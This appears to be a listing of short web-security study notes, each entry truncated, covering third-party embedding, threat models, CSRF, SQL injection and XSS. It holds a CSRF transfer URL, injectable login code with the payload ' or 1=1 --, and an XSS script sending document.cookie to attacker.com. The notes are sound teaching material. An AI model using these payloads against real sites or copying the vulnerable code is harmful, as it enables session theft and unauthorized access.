Nov 21, 2018 | » | Web Applications 101
2 min; updated Mar 14, 2021
How does a page embed content from other domains?

Method 1: Loading a third-party script that modifies the page.

    <html>
      <!-- Page Content -->
      <div id="widget"></div>
      <script src="https://third-party.com/widget.js"></script>
    </html>

Method 2: Loading a third-party resource in an iframe.

    <html>
      <!-- Page Content -->
      <iframe src="https://third-party.com/widget.js"></iframe>
    </html>

How do you stay logged in w/o re-entering a password? HTTP cookies! Alice's browser sends a GET request to http://www.example.com/. http://www.example.com responds with a Set-Cookie instruction containing a token representing the logged-in state, e....
Nov 21, 2018 | » | 02. Threat Models for Web Security
1 min; updated Mar 14, 2021
#1: Network adversary. Addressed by secure communication protocols (+ network security).

#2: User visits the adversary's page. Variants: the attacker gets the user to click a link, e.g. one that adds an item to their shopping cart; the attacker gets the user's browser to request a link.

#3: Adversary is a third party:

    <iframe src="https://third-party.com/widget"></iframe>

Note that an adversary script being embedded directly, e.g. through a <script> tag, is not a threat model!...
Nov 21, 2018 | » | 03. Cross-Site Request Forgery (XSRF)
2 min; updated Sep 5, 2022
Cross-Site Request Forgery (XSRF)

    <img src="http://bank.com/transfer?from=from_ID&to=to_ID&value=1000">

Because the user is logged in and has a cookie, the victim site trusts the user's browser. The attacker gets the user/browser to execute a command on the victim site, e.g. request a link, post a form. The command has permanent effects.

A frame can navigate its immediate children. Why is it designed such that it can't navigate its children too? Consider a website with a login frame, where the user inputs passwords....
Nov 25, 2018 | » | SQL Injection
1 min; updated Mar 14, 2021
In a SQL injection attack, the attacker provides malicious form input that is fed into a DB server. Outcomes may include data deletion, bypassing access control, etc.

Sample buggy login, server-side code (the string concatenation is the bug):

    results = db.execute(
        "SELECT * FROM Users WHERE user='" + form["user"] + "' " +
        "AND pwd='" + form["pwd"] + "'")
    if results:
        login(results)
    else:
        login_failed(form)

An attacker can supply ' or 1=1 -- as the value for user....
Nov 21, 2018 | » | Cross-Site Scripting (XSS)
2 min; updated Mar 14, 2021
XSS 101

Suppose a site, given a non-existent path, e.g. http://victim.com/path, writes this error message: Error 404! `path` not found. An attacker can then lead a user to opening http://victim.com/attacker_supplied_string, where attacker_supplied_string is:

    <script>
      let addr = "http://attacker.com/?" + escape(document.cookie);
      document.write(`<img src="${addr}" />`);
    </script>

Suppose a site uses Force HTTPS. If a <script src="http://..."> is not redirected to an HTTPS URL, then an active attacker could still replace the JS code in the HTTP response with malicious code that would run on the HTTPS page!...